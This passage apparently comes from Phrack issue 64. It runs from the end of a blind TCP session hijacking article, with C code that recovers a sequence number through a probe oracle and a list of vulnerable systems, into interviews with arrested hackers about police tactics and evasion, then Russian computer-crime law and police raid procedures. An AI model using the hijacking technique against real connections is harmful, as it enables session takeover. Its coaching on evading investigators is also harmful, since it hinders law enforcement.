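/* Recover hidden_snd_next using only probe(). */
uint32_t find_snd_next(void)
{
    uint32_t base, lo, hi, mid;

    if (probe(0)) {             /* SND.NEXT is in [0, 2^31]            */
        base = 0;
        hi = 0x80000000u;
    } else {                    /* SND.NEXT is in [2^31+1, 2^32-1]     */
        base = 0x80000000u;
        hi = 0x7fffffffu;
    }
    lo = 0;                     /* base + lo is known to be accepted   */
    while (lo < hi) {
        mid = lo + (hi - lo + 1) / 2;   /* upper midpoint              */
        if (probe(base + mid))
            lo = mid;           /* accepted: SND.NEXT is at or above   */
        else
            hi = mid - 1;       /* rejected: SND.NEXT is below         */
    }
    return base + lo;           /* largest accepted value = SND.NEXT   */
}
```

This particular sketch needs one initial query plus at most 32 halving steps,
so it is in the same ballpark as the figure quoted above rather than an exact
match for it.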


Now, at last we have all the required information and we can perform the
session hijacking from either client or server.


--[ 4 - Discussion


In this section we'll attempt to identify the affected systems, discuss
limitations of this attack, and present similar attacks against older systems.


----[ 4.1 - Vulnerable systems


This attack has been tested on Windows 2K, Windows XP <= SP2, and FreeBSD 4. 
It should be noted that FreeBSD has a kernel option to randomize the IP ID, 
which makes this attack impossible. As far as we know, there’s no fix for 
Windows 2K and XP. 


The only "bug" which makes this attack possible on the vulnerable systems is
the non-randomized IP ID. The other behaviors (ACK checking that enables us
to do a binary search, etc...) are expected by RFC793 [2] (however, there's
been work to improve these problems in [4]).


It's interesting to see that, as far as we could test, only Windows 2K,
Windows XP, and FreeBSD 4 were vulnerable. There are other OSes which use the
same IP ID incrementation system, but they don't use the same ACK checking
mechanism. Hmm.. this similarity between Windows's and FreeBSD's TCP/IP
stack behavior is troubling... :) MacOS X is based on FreeBSD but is not
vulnerable because it uses a different IP ID numbering scheme. Windows Vista
wasn't tested.


----[ 4.2 - Limitations 


The described attack has various limitations: 


First, the attack doesn't work "as is" on Windows 98. That's not really a
limitation, because the initial SEQ of Windows 98 is equal to the uptime of
the machine in milliseconds, modulo 2^32. We won't discuss how to do
hijacking with Windows 98 because it's a trivial joke :)


Secondly, the attack will be difficult if the client has a slow connection, 
or has a lot of traffic (messing with the IP ID analysis). Also, there’s the 
problem of the latency between the client and the server. These problems can 
be mitigated by writing an intelligent tool which measures the latency, 
detects when the host has traffic, etc... 


Furthermore, we need access to the client host. We need to be able to send
packets and receive replies to get the IP ID. Any type of packet will do, ICMP
or TCP or whatever. The attack will not be possible if the host is behind a
firewall/NAT/... which blocks absolutely all types of packets, but 1
unfiltered port (even closed on the client) suffices to make the attack
possible. This problem is present against Windows XP SP2 and later, which
come with an integrated firewall. Windows XP SP2 is vulnerable, but the
firewall may prevent the attack in some situations.


--[ 5 - Conclusion


In this paper we have presented a method of blind TCP hijacking which works 
on Windows 2K/XP, and FreeBSD 4. While this method has a number of 
limitations, it’s perfectly feasible and works against a large number of 
hosts. Furthermore, a large number of protocols over TCP still use 
unencrypted communication, so the impact on security of the blind TCP 
hijacking is not negligible.


              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 10              (* *)
            | - |                                            | - |
            |   |     Know your enemy : facing the cops      |   |
            |   |                                            |   |
            |   |                 By Lance                   |   |
            |   |                                            |   |
            |   |                                            |   |
            (____________________________________________________)


The following article is divided into three parts. The first and
second parts are interviews done by The Circle of Lost Hackers. The
people interviewed are busted hackers. You can learn, through their
experiences, how cops work in each of their countries. The last
part of this article is a description of how a Computer Crime Unit
proceeds to bust hackers. We know that this article will probably help
more policemen than hackers, but if hackers know how the cops proceed
they can counter them. That's the goal of this article.


Have a nice read. 


(Hi Lance! :;) 


Willy’s interview 


<THE CIRCLE OF LOST HACKERS> Hi WILLY, can you tell us who are you, 
what’s your nationality, and what’s your daily job ? 


hi. i’m from germany. i actually finished law school. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell us what kind of 
relationship you’re having with the police in your country ? In some other 
European country, the law is hardening these days, what about germany ? 


Well, due to the nature of my finished studies, I can view the laws
from a professional point. The laws about computer crime did not change
since years. so you cant say they are getting harder. What we can say is,
that due to 9/11/01, some privacy laws got stricter


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you explain us what kind of 
privacy laws got stricter ? 


Yeah. for example all universities have to point students that are
muslims, between 20/30, not married, etc. so police can do a screen
search. Some german courts said this is illegal, some said not. the
process is on-going, but the screen searches didnt have much results
yet. On the other hand, we have pretty active privacy-protection people
("datenschutzbeauftragte") which are trying to get privacy a fundamental
right written in the constitution. So, the process is like we have
certain people who want a stricter privacy law, e.g. observation due to
video-cameras on public places. (which does happen already somewhere).
But, again, we have active people in the country who work against these
kind of observation methods. its not really decided if the supervision
is getting stronger. What is getting stronger are all these DNA-tests now
for certain kind of crimes, but its still not the way that any convicted
person is in a DNA database - luckily.


<THE CIRCLE OF LOST HACKERS> QUESTION: Do you have the feeling that 
Computer related law is stricter since 09/11/01 ? 


Definitly not. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Are these non-computer related 
enforcements happened since the schroeder re-election ? 


Nope. these enforcements ("Sicherheitspaket") happened after 9/11. the
re-election of schroeder had nothing to do with enforcements. On
one hand, ISP's have to keep the logfiles of dial-in IP's for 90
days. but federal ministry of economics and technology is supporting
a project called "JAP" (java anonymous proxy) to realize anonymous
unobservable communication. I dont know in details, but I'm pretty
sure the realisation of JAP is not ok with the actual laws in germany,
because you can surf really completely anonymously with JAP. this is not
corresponding with the law to keep the logfiles. i dont know. from my
point of view, even though i (of course) like JAP, it is not compatible
with current german law. but its supported by a federal ministry. thats
pretty strange i think. well, we'll see. You can get information about
this on http://anon.inf.tu-dresden.de/index_en.html


<THE CIRCLE OF LOST HACKERS> QUESTION: now that we know a bit more about
the context, can you explain to us how you got into hacking, and since when
you are involved in the scene ?


Well, how did i get contact to the scene? i guess it was the way pretty
many people started. i wanted to have the newest games. so I talked to
some older guys at my school, and they told me to get a modem and call
some BBS. This was i guess 1991. you need to know that my hometown
Berlin was pretty active with BBS, due to a political reason : local
calls did only cost 23pf. That was a special thing in west-berlin /
cold-war. I cant remember when it was abolished. but, so there were many many
BBS in berlin due to the low costs. Then, short time after, i got in
contact with guys who always got the newest stuff from USA/UK into the
BBS, and i thought "wham, that must be expensive". it didnt take a long
time until i found out that there are ways to get around this. Also,
I had a local mentor who introduced me to blueboxing and all the neat
stuff around PBX, VMBS and stuff.


<THE CIRCLE OF LOST HACKERS> QUESTION: when did you start to play with 
TCP/IP network ? 


I think that was pretty late. i heard that some of my overseas friends
had a new way of chatting. no chat on BBS anymore, but on IRC. I guess
this was in 1994. So, i got some information, some accounts on a local
university, and i only used "the net" for irc’ing.


<THE CIRCLE OF LOST HACKERS> QUESTION: When (and why) did you get into
trouble for the first time ?


Luckily, i only got into trouble once in 1997. I got a visit from four
policemen (with weapons), who had a search warrant and did search my
house. I was accused of espionage of data. thats how they call hacking
here. They took all my equipment and stuff and it took a long time until
i heard of them again for a questioning . I was at the police several
times. first time, I think after 6 months, was due to a meeting with the
state attorney and the policemen. This was just a meeting to see if
they can use my computer stuff as proof. It was like they switched the
computer on, the policemen said to the attorney "this could be a log file"
and the attorney said "ok this might be a proof". this went for all cd’s
and at least 20 papers with notes. ("this could be an IP address". "this
could be a l/p", etc.) . Of course, the attorney didnt have much knowledge,
and i lost my notes with phone numbers on it ("yeah, but it could be
an IP") . However, this was just a mandatory meeting because I denied
anything and didnt allow them to use any of the stuff, so there has to
be a judge or an attorney to see if the police took things that can be
proof at all. The second time I met them was for the crimes in question. I
was there for a questioning (more than 2 years after the raid, and almost
3 years after the actual date where i should have done the crime) .


<THE CIRCLE OF LOST HACKERS> QUESTION: How long did you stay at the
police station just after the first search ?


First time, that was only 15 minutes. It was really only to see if the 
police took the correct stuff. e.g. if they had taken a book, I would 
have to get it back. because a book cant have anything to do with my 
accused crime. (except i had written IP numbers in that book, hehe) 


<THE CIRCLE OF LOST HACKERS> QUESTION: what about the crime itself ? Did
you earn money or make people effectively lose money by hacking ?


No, i didnt earn any money. it was just for fun, to learn, and to see
how far you can push a border. see what is possible, whats not. People
didnt lose any money, either.


<THE CIRCLE OF LOST HACKERS> QUESTION: How did they find you ? 


I still dont really know how they found me. the accused crime was (just)
the unauthorized usage of dial-in accounts at one university. Unluckily,
it was the starting point of my activities, so i was a bit scared at
first. You have to dial-in somewhere, and if that facility busts you,
it could have been pretty bad. At the end, after the real questioning
and after i got my fine, they had to drop ALL accusations of hacking and i
was only guilty of having 9 warez cd’s.


<THE CIRCLE OF LOST HACKERS> QUESTION: were you dialing from your home ? 


Yeah from my home. but i didnt use ISDN or have a caller ID on my analog
line, and it is not ok to tap a phone line for such a low-profile crime
like hacking here in germany . So, since all hacking accusations got dropped,
I didnt see what evidence they had, or how they got me at all.


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell more about the 
policemen ? What kind of organisation did bust you ?


It was a special department for computer crime organized by the state
police, the "landeskriminalamt" LKA. They didnt know much about computers
at all i think. They didnt find all logfiles I had on my computer, they
didnt find my JAZ disks with passwd files, they didnt find passwd files
on my comp., etc.


<THE CIRCLE OF LOST HACKERS> QUESTION: Where did they bring u after
being busted at the raid, and the second time for the interview ?


After the raid, I could stay at home ! For the interview, I went to the
headquarters of the LKA, into the rooms of the computer crime unit. simple
room with one window, a table & chair, and a computer where the policeman
himself did type what he asked, and what i answered.


<THE CIRCLE OF LOST HACKERS> QUESTION: did you hear any interesting
conversations between cops when you were in there ?


hehe nope. not at all. and, of course, the door to the
questioning room was closed when i was questioned. so i couldnt
hear anything else . I have been interviewed by only one guy, a
"polizeihauptkommissar", no military grade, only a captain like explained
in http://police-badges.de/online/sammeln/us-polizei.html


Another thing about the raid: they did ring normally, nothing with
bashing the door. if my mother hadnt opened the door, i would have had
enough time to destroy things. but unluckily, as most germans, she did
open the door when she heard the word "police" hehe.


I didnt have a trial, I accepted an "order of summary punishment" . this
is the technical term i looked up in the dictionary :-) This is something
that a judge decides after he has all information. he can open a trial
or use this order of summary punishment. they mail it to you, and if
you dont say "no, i deny" within one week, you accepted it :-) When you
deny it, THEN you definitely decide to go to court and have a trial.


<THE CIRCLE OF LOST HACKERS> QUESTION: do you advise hackers to accept 


You cant generally give an advice about that. in my case, i found it 
important that i do not have any crime record at all and that i count 
as "first offender" if i ever have a trial in the future. so with that 
acceptance of the summary, i knew what i get, which was acceptable for
my case. if you go to court, you can never know if the fine will be
much higher. but you cant generalize it. if its below "90 tagessaetze"
(--> over 90 you get a crime record), i guess i would accept it, but
again, better go to a lawyer of your trust :-) 


<THE CIRCLE OF LOST HACKERS> QUESTION: can you compare LKA with an 
american and/or european organisation ? What is their activity if they
are not skilled with computers ?


Mmmm every state within germany has its special department called LKA.
Its not like the FBI (that would be BKA), but it would be like a state
in the usa, say florida, has a police department for whole florida
which does all the special stuff, like organized crime. Computer crime
in germany belongs to economic crime, and therefore, the normal police
isnt the correct department, but the LKA. By the way, I heard from
different people that they are more skilled now. but at that time, I
think only one person had an idea about UNIX at all. I know that the BKA
has a special department for computer crime, because a friend of mine got
visited by the BKA, but, most computer crime departments here are against
child-porn. I dont think that too many people get busted for hacking in
germany at all. they do bust child porn, they do bust warez guys, they
do bust computer fraud, related to telco-crimes. but hacking, I dont
know lots of people who had problems for real hacking. except one guy


<THE CIRCLE OF LOST HACKERS> QUESTION: are there special services in your
country that are involved in hacking ?


Special services ? what do you mean? like CIA ? hehe ?! We have
BND (counter-spying), MAD (military spying), verfassungsschutz
(inland-spying), but I dont think we have a service that is concentrating
on computer crime. What we do have is a lot of NSA (echelon) stations
from the US. I guess because of the cold war, we’re still pretty much
under the supervision of these services :-) so the answer is: we dont
have such services, or they do work so secret that no one knows, but i
doubt this in germany hehe.


<THE CIRCLE OF LOST HACKERS> QUESTION: Except for the crime they charged
you with, did you have any relations with the police ? (phone calls,
unrelated interviews, job offers) ?


Hehe, no, not at all. 


<THE CIRCLE OF LOST HACKERS> QUESTION: what kind of information was 
the police asking you during your interview ? Were they asking non 
crime-related information ? (like: who are you chilling with, etc ?) 


Yeah, that was the part they were most interested in ! They had
printed my /etc/passwd and said "thats your nick, right?" . I didnt say
anything to that whole complex, but they continued, and I mean, if you
have one user in your /etc/passwd, it is pretty easy to guess thats
your nick. So, they had searched the net for that nick, they found a
page maintained by some hackers who formed some kind of crew. they had
printed the whole website of that crew, pointing out my name anywhere
where it appeared. They tried to play the good-cop game, the "you’re that
cool dude there, eh?" etc. I didnt say anything again. It took several
minutes, and they wanted to pin-point me that i’m using this nick they
found in /etc/passwd and that i am a member of that group whose
webpage they had printed. They knew that there was a 2nd hacker at that
university. They asked me all the time if i know him. I dont know why
he had more luck. of course i did know him, it was my mate with whom i
did lots of the stuff together.


<THE CIRCLE OF LOST HACKERS> QUESTION: You didnt say anything ? How did
they accept this ?


hehe. they had to accept it. i think thats in most countries that, if
you are accused, you have the right to say nothing. I played an easy
game: I accepted to have copied the 9 cd’s. because the cd’s are proof
enough, then the cops were happy. I didnt say anything to that
hacking complex, which was way more interesting for them. I thought "I
have to give them something, if I dont want to go before court" . I said
"I did copy that windows cd" so they have at least something.


<THE CIRCLE OF LOST HACKERS> QUESTION: did you feel some kind of evolution
in your relation with police ? Did they try to be friends with you at
some point ?


yeah, they did try to be friends at several stages.


a) At the raid. my parents were REALLY not amused, i think you can
imagine that. having policemen sneaking through your clothes, your bedroom,
etc. So, they noticed my mom was pretty much nervous and "at the end"
They said "make it easy for your mother, be honest, be a nice guy,
its the first time, tell us something ..." (due to my starting law
school at that time, I, of course knew that its the best thing to stay
calm and say nothing.)


b) At the questioning, of course. after I admitted the warez stuff,
they felt pretty good, which was my intention. they allowed me to smoke,
and stuff like that. when it came to hacking, and i didnt say anything,
They continued to be "my friend", and tried to convince me "that its
easier and better if i admit it, because evidence is so high" . They
were friendly all the time, yeah.


<THE CIRCLE OF LOST HACKERS> QUESTION: What do you think they really
knew ?


They definitely knew I used unauthorized dial-in accounts at that
university, they knew I was using that nick, and that I am a member of
that hacking group (nothing illegal about that, though) . I was afraid
that they might know my real activities, because, again, that university
was JUST my starting point, so all i did there was use accounts i shouldnt
use. Thats no big deal at all, dial-ins. but i didnt know what they knew
about the real activities after the dial-in, so i was afraid that they
knew more about this.


<THE CIRCLE OF LOST HACKERS> QUESTION: did they know personal things
about the other people in your hacking group ?


nope, not at all. 


<THE CIRCLE OF LOST HACKERS> QUESTION: How skilled are the forensics 
employed by german police in 2002 ? 


huh, i luckily dont know. I read that they do have some forensic
experts at the BKA, but the usually busting LKA isnt very skilled, in my
opinion. they have too few people to cover all the computer crimes. they
work on low money with old equipment. and they use much of their time
to go after kiddie-porn.


<THE CIRCLE OF LOST HACKERS> QUESTION: how did the police perceive
your group ? (front-side german hacking group you guyz all know)


I think they thought we’re a big active crew which does hacking, hacking
and hacking all the time. i guess they wanted to find out if we earn
money with that, e.g., or if we’re into big illegal activities. because
of course, it might be illegal just to be a member of an illegal group.
like organized crime.


<THE CIRCLE OF LOST HACKERS> QUESTION: on the other hand, what do you
think the other hacking crews think about your group ?


We and other hackers saw us as a group which shares knowledge, exchanges
security related information, has nice meetings, finds security problems
and writes software to exploit those problems. I definitely did not see us
as an organized hacking group which earns money, steals stuff or makes other
people lose money, but, I mean, you cant know what a group really does
just from visiting a webpage and looking at some papers or tools.


<THE CIRCLE OF LOST HACKERS> QUESTION: are the troubles over now ? 


yeah, troubles are completely over now. i got a fine, 75 german marks 
per cd, so i had to pay around 800 german marks. I am not previously 
convicted, no crime record at all. no civil action. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Now that troubles are over, do you
have some advice for hackers in your country, to avoid being busted,
or to avoid having troubles like you did ?


hehe yeah, in short words: 


a) Always crypt your ENTIRE harddisk 


b) Do NOT own any, i repeat, any illegal warez cd. reason: any judge
knows illegally copied cds. he understands that. so, like in my case,
you get accused of hacking and you end up with a fine for illegal
warez. Thats definitely not necessary. and, furthermore, you get your
computer stuff back MUCH easier & faster if you dont have any warez
cd. usually, they cant prove your hacking. but warez cd’s are easy.


c) do not tell ANYTHING at the raid.


d) if you are really in trouble, go to a lawyer after the raid.


<THE CIRCLE OF LOST HACKERS> Thanks for the interview WILLY ! 


De nada, you are welcome ;)


Zac’s interview 


<THE CIRCLE OF LOST HACKERS> Hello Zac, nice to meet you 


Hi new staff, how’s life ? 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell us what kind of 
relationship you’re (as a hacker) having with the police in your country ? 


I live in France, as a hacker I never had troubles with justice . In my
country, you can have troubles in case you are a stupid script kiddy (most
of the time), or if you disturb (even very little) intelligence services .


Actually we have very present special services inside the territory,
whereas the police itself is too dumb to understand anything about
computers . Some special non-technical group called BEFTI usually deals
with big warezers, dumb carders, or people breaking into businesses’
PABX and doing free calls from there, and stuff like that .


<THE CIRCLE OF LOST HACKERS> Explain to us how you got into hacking, 
since when you are involved in the scene, and when you started to play 
with TCP/IP networks 


I started quite late in the 90’s when I met friends who were doing warez
and trying to start with hacking and phreaking . I have only a few years
of experience on the net, but I learnt quite fast being always behind
the screen, and now I know a lot of people, all around the world, on
IRC and IRL .


Beside this, I had my first computer 15 years ago, owned many INTEL based
computers, from 286 to Pentium II . I have now access to various hardware
and use these resources to code . I used to share my work with other
people (both whitehats and blackhats), I dont hide myself particularly
and I am not involved in any kind of dangerous illegal activity .


<THE CIRCLE OF LOST HACKERS> QUESTION: When did you get into trouble
for the first time ?


Last year (2001), when DST (’Direction de la Surveillance du Territoire’,
french inside-territory intelligence services) contacted me and asked if
I was still looking for a job . I said yes and accepted to meet them .
I didnt know it was DST at that time, but I caught them using google ;)
They first introduced themselves as from ’Ministere de l’Interieur’, which is
basically the Ministry in charge of police coordination and inside-territory
intelligence services . In another later interview, they told me they
were DST, I’ll call them ’the feds’ .


<THE CIRCLE OF LOST HACKERS> QUESTION: How did they find you ? 


I still have no idea, I guess someone around me told them about me .
When I asked, they told me it was from one of the various (very few)
businesses I had contacted at that time . Take care when you give your
CV or anything, keep it encrypted when it travels on the net, because
they probably sniff a lot of traffic . I also advise to mark it in a
different way each time you give it, so that you can know from where it
leaked using SE at the feds .
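

The marking advice above can be sketched in a few lines of Python. This is
only an illustration under assumptions: the secret key, the recipient names
and the choice of a keyed hash are made up here and are not described in the
interview. The idea is simply that each copy carries a short tag derived
from the recipient, so a copy that comes back can be traced to where it
was sent.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Hypothetical secret, known only to the owner of the CV.
SECRET_KEY = b"replace-with-your-own-secret"


def mark_for(recipient: str, length: int = 8) -> str:
    """Derive a short hex tag that is different for each recipient."""
    mac = hmac.new(SECRET_KEY, recipient.encode("utf-8"), hashlib.sha256)
    return mac.hexdigest()[:length]


def who_leaked(tag: str, recipients: Iterable[str]) -> Optional[str]:
    """Return the recipient whose copy carried this tag, or None."""
    for name in recipients:
        if hmac.compare_digest(mark_for(name), tag):
            return name
    return None


# Hypothetical recipients; each one receives a copy carrying its own tag.
recipients = ["company-a", "company-b", "company-c"]
tags = {name: mark_for(name) for name in recipients}
```

The tag could be hidden anywhere in the document (a reference number, a
slightly different phone extension, a file name); where to put it is left
open here.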


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell more about the 
organization ? 


Some information about them has already been disclosed in french
electronic fanzines like Core-Dump (’92) and NoWay (’94), both written
by NeurAlien . I heard he got mad problems because of this, I dont really
want to experience the same stuff .


<THE CIRCLE OF LOST HACKERS> QUESTION: are there other special services
in your country that are involved in hacking ?


Besides DST, there is DGSE (’Direction Generale de la Securite Exterieure’),
these guys mostly focus on spying, military training, and information
gathering outside the territory . There is also RG (’Renseignements
Generaux’, trans. : General Information) , a special part of police
which is used to gather various information about every sensitive event
happening . The rumor says there’s always 1 RG in each public conference,
meeting, etc and its not very difficult to believe .


<THE CIRCLE OF LOST HACKERS> QUESTION: can you compare the organization 
with an equivalent one in another country ? 


Their tasks are similar to the CIA’s and NSA’s I guess . DST and DGSE
used to deal with terrorists and big drug traffic networks also, they
do not target hackers specifically, their task is much larger since they
are the governmental intelligence services in France .


<THE CIRCLE OF LOST HACKERS> Is DST skilled with computers ?


They -seem- quite skilled (not too much, but probably enough to bust a
lot of hackers and keep them on tape if necessary) . They also used to
recruit people in order to experiment with all the new hacking techniques
(wireless, etc) .


However, I feel like their first job is learning information, all
the technical stuff looks like a hook to me . Moreover, they pay very
badly, they’ll argue that having their name on your CV will increase your
chances to get high paid jobs in the future . Think twice before signing,
this kind of person has a strong tendency to lie .


<THE CIRCLE OF LOST HACKERS> QUESTION: what kind of information did they 
ask during the interviews ? 


The first time, it was 2 hours long, and there were 2 guyz . One was
obviously understanding a bit about hacking (talking about protocols,
reverse engineering, he assimilated the vocabulary at least), the other
one wasnt making the difference between an exploit and a rootkit, and
was probably the ’nice fed around’ .


They asked everything about myself (origin, family, etc), one always
taking notes, both asking questions, trying to appear interested
in my life . They asked everything from the start to the end . They
asked if the official activity I have right now wasnt too boring,
who were the guys I was working with, in what kind of activity I was
involved, and the nature of my personal work . They also asked me if I
was aware of 0day vulnerabilities in widely-used software . I knew I
had not to tell them anything, and to try to get as much information about
them during the interview . You can definitely grab some if you ask them
questions . Usually, they will tell you ’Here I am asking the questions’,
but sometimes if you are smart, you can guess from where they got the
information, what their real technical skill level is, etc .


At the end of the interview, they’ll ask what they want to know if you
didnt tell them . They can ask about groups they think you are friends
with, etc . If you just tell them what is obviously known (like,
’oh yeah I heard about them, its a crew interested in security, but
I’m not in that group’) and nothing else, its ok .


<THE CIRCLE OF LOST HACKERS> QUESTION: What do you think they really
knew ?


I guess they are quite smart, because they know a lot of stuff, and
ask everything as if they knew nothing . This way, they
can spot if you are lying or not . Also, if you tell them stuff you
judge irrelevant, they will probably use it during other interviews,
in order to guess who you are linked to .


<THE CIRCLE OF LOST HACKERS> QUESTION: are the troubles over now ? 


I hope they will leave me where I am, anyway I wont work for them, I
told a few friends of mine about it and they agreed with me . Their
mind changes over time and government, I highly advise -NOT- to work
for them unless you know EXACTLY what you are doing (you are a double
agent or something lol) .


<THE CIRCLE OF LOST HACKERS> do you have some advice for hackers in
your country, to avoid being busted, or to avoid having troubles ?


Dont have a website, dont release shit, dont write articles, dont do
conferences, dont have a job in the sec. industry . In short : it’s very
hard . If they are interested in the stuff you do and hear about it,
they’ll have to meet you one day or another . They will probably just
ask more about what you are doing, even if they have nothing against
you . Dont forget you have the right to refuse an interview and refuse
answering questions . I do not recommend to lie to them, because they
will guess it easily (dont forget information leakage is their job) .


I advise all the hackers to talk more about feds in their respective
groups because it helps not being fucked . Usually they will tell
you before leaving ’Dont forget, all of this is CONFIDENTIAL’, it is
just their way to tell you ’Okay, thanks, see you next time !’ . Dont
be impressed, dont spread information on the net about a particular guy
(targeted hacker, or fed), you’ll obviously have troubles because of it,
and its definitely not the good way to hope for better deals with feds in
the future . To FEDS: do not threaten hackers and dont put them in jail,
we are not terrorists . Dont forget, we talk about you to each other,
and jailing one of us is like jailing all of us .


<THE CIRCLE OF LOST HACKERS> Thanks zac =) 


At your service, later 


Big Brother does Russia 
by 
ALIEN Assault 


This file is a basic description of russian computer law related
issues. Part 1 contains information gathered primarily from
open sources. As these sources are all russian, the information may be
unknown to those who dont know the russian language. Part 2 consists
of instructions on computer crime investigation: raid guidelines and
suspect’s system exploration.


0 - DISCLAIMER
1 - LAW
  1.1 - Basic Picture
  1.2 - Criminal Code
  1.3 - Federal Laws
2 - ORDER
  2.1 - Tactics of Raid
  2.2 - Examining a Working Computer
  2.3 - Expertise Assignment


--[ 0. DISCLAIMER.


INFORMATION PROVIDED FOR EDUCATIONAL PURPOSES ONLY. IT MAY BE ILLEGAL 
IN YOUR COUNTRY TO BUST HACKERS. IT MUST BE ILLEGAL AT ALL. THERE ARE 
BETTER THINGS TO DO. EXPLORE YOURSELF AND THIS WORLD. SMILE. LIVE. 


--[ 1. LAW.


----[ 1.1. Basic Picture.


Computer-related laws are still very much drafts and poorly describe what
they are about. Seems that these are simply rewritten instructions
from 60’s *Power Computers* that took a truck to transport.


Common subjects of lawsuits include carding, phone piracy (mass
LD service thievery) and... hold your breath... virii infected
warez trade. Russia is a real warez heaven: you can go to about
every media shop and see lots of CDs with warez, and some even have
"CRACKS AND SERIALS USAGE INSTRUCTIONS INCLUDED" written on the front
cover (along with "ALL RIGHTS RESERVED" on the back)! To honour pirates,
they include all .nfo files (sometimes from 4-5 BBSes the warez was
couriered through). It is illegal but not prosecuted. Only if the
warez are infected (and some VIP bought them and messed his system up)
do shop owners face legal problems.


Hacking is *not that common*, as cops are rather dumb and mostly bust
script kiddies for hacking their ISPs from home or sending your
everyday trojans by email.


There are three main organisations dealing with hi-tech crime:
FAPSI (Federal Government Communications and Information Agency
- mix of FCC and secret service), UKIB FSB (hi-tech feds; stands for
department of computer and information security) and UPBSWT MVD
(hi-tech crime fightback dept.) which incorporates R unit (R for radio -
busts ham pirates and phreaks).


FSB (secret service) also runs NIIT (IT research institute).
This organisation deals with encryption (reading your PGPed mail),
examination of malicious programs (revealing Windoze source) and
restoration of damaged data (HEXediting saved games). NIIT is believed
to possess all seized systems so they have tools to do the job.


UPBSWT has a set of special operations called SORM (operative
and detective measures system). Media describe this as an
Echelon/Carnivore-like thing, but it also monitors phones and
pagers. Cops claim that SORM is active only during major criminal
investigations.


----[ 1.2. Criminal Code. 


Computer criminals are prosecuted according to these articles of the Code:


- 159: Fraud. This is mostly what carders have to deal with, accompanied by
caught-in-the-act social engineers. Punishment varies
from fine (minor, no criminal record) to 10 years prison term
(organized and repeated crime).


- 272: Unauthorized access to computer information. Easy case will end
up in fine or up to 2 years probation term, while organized, repeated
or involving "a person with access to a computer, computer complex
or network" (!#S@!) crime may lead to 5 years imprisonment.
Added to this are weird comments on what are information,
intrusion and information access.


- 273: Production, spreading and use of harmful computer
programs. Sending trojans by mail is considered to be lame and punished
by up to 3 years in prison. Part II says that "same deeds *carelessly*
caused hard consequences" will result in from 3 to 7 years in jail.


- 274: Computer, computer complex or network usage rules breach. This
one is tough shit. In present, raw and somewhat confused
state this looks, say, *incorrect*. It needs at least a
technically literate person to provide correct and clear
definitions. After those clarifications this could be a useful thing:
if someone gets into a poorly protected system, admin will
have to take responsibility too. Punishment ranges from ceasing
of right to occupy "defined" (defined where?) job positions to
2 years prison term (or 4 if something fucked up too seriously).


----[ 1.3. Federal Law.


Most notable subject related laws are:


"On Information, Informatization and Information Security"
(20.02.95). 5 chapters of this law define /* usually not
correct or even intelligent */ various aspects of information and
related issues. Nothing really special or important - civil rights
(nonexistent), other crap, but still having publicity (due to weird
and easy-to-remember name i suppose) and about every journalist covering
ITsec pastes this name into his article for serious look maybe.


"National Information Security Doctrine" (9.9.2K) is far more
interesting. It will tell you how dangerous Information Superhighway
is, and this isn’t your average mass-media horror story - it’s
a real thing! Reader will know how hostile foreign governments are
busy implementing some k-rad mind control tekne3q to gain r00t on
your consciousness; undercover groups around the globe are engaging in
obscure infowarfare; unnamed but almighty worldwide forces are also about
to control information...ARRGGH! PHEAR!!!


{ALIEN special note: That’s completely true. You suck Terrans. We’ll
own your planet soon and give all of you a nice heavy industry job}.


Liberal values are covered too (message is BUY RUSSIAN). Also there are 
some definitions (partly correct) on ITsec issues. 


"On Federal Government Communications and Information" (19.2.93, 
patched 24.12.93 and 7.11.2K). Oh yes, this one is serious. Everyone 
is serious about his own communications - what can i say? Main message 
is "RESPONSIBLES WILL BE FOUND. OTHERS KEEP ASIDE". 


Interesting entity defined here is Cryptographic Human Resource -
a special unit of highly qualified crypto professionals which must be
founded by FAPSI. To be in Cryptographic Human Resource is to serve
whether you have retired or anything.


Also covered are rights of government communications personnel. They 
have no right to engage in or to support strike. Basically they have 
no right to fight for rights. They don’t have a right to publish or 
to tell mass-media anything about their job without previous censorship 
by upper level management. 


Cryptography issues are covered in "On Information Security
Tools Certification" (26.6.95 patched 23.4.96 and 29.3.99) and "On
Electronic Digital Signature" (10.2.02). Not much to say about. Both
mostly consist of strong definitions of certification procedures.


--[ 2. ORDER. 


----[ 2.1. Tactics of Raid. 


The information given here is necessary for a successful raid. Tactics of
the raid strongly depend on previously obtained information.


It is necessary to define the time for the raid and the measures needed to
conduct it suddenly and confidentially. If there is information
that the suspect’s computer contains criminal evidence data, it is
better to begin the raid when the possibility that the suspect is working
on that computer is minimal.


Consult with specialists to define what information could be stored
in a computer and have adequate technics prepared to copy that
information. Define all measures to prevent criminals from destroying
evidence. Find raid witnesses who are familiar with computers
(basic operations, program names etc.) to exclude the possibility of
posing raid results as erroneous at court. The specificity and complexity
of manipulations with computer technics cannot be understood
by the illiterate, so this may destroy the investigator's efforts on
strengthening the value of evidence.


Witness’ misunderstanding of what goes on may make court discard evidence. 
Depending on suspect’s qualification and professional skills, 
define a computer technics professional to involve in investigation. 


On arrival at the raid point it is necessary to enter fast and suddenly
to drive the possibility of destruction of computer-stored information to
the minimum. When possible and reasonable, the raid point power supply
must be turned off.


Don't allow anyone to touch a working computer or floppy disks, or to
turn computers on and off; if necessary, remove raid personnel from the
raid point; don't allow anyone to turn the power supply on and off; if the
power supply was turned off at the beginning of the raid, it is necessary
to unplug all computers and peripherals before turning the power supply
on; don't manipulate computer technics in any manner that could provide
unpredictable results.


After all the above measures were taken, it is necessary
to preexamine computer technics to define what programs are working
at the moment. If a data destruction program is discovered active,
it should be stopped immediately and examination begins with exactly
this computer. If computers are connected to a local network, it is
reasonable to examine the server first, then working computers, then other
computer technics and power sources.


----[ 2.2. Examining a Working Computer.


During the examination of a working computer it is necessary to:


- define what program is currently executing. This must be done by
  examining the screen image, which must be described in detail in the
  raid protocol. When necessary, it should be photographed or videotaped.
  Stop the running program and fix the results of this action in the
  protocol, describing the changes that occurred on the computer screen;


- define presence of external storage devices: a hard drive (a
  winchester*), floppy and ZIP type drives, presence of a virtual drive
  (a temporary disc which is being created on computer startup for
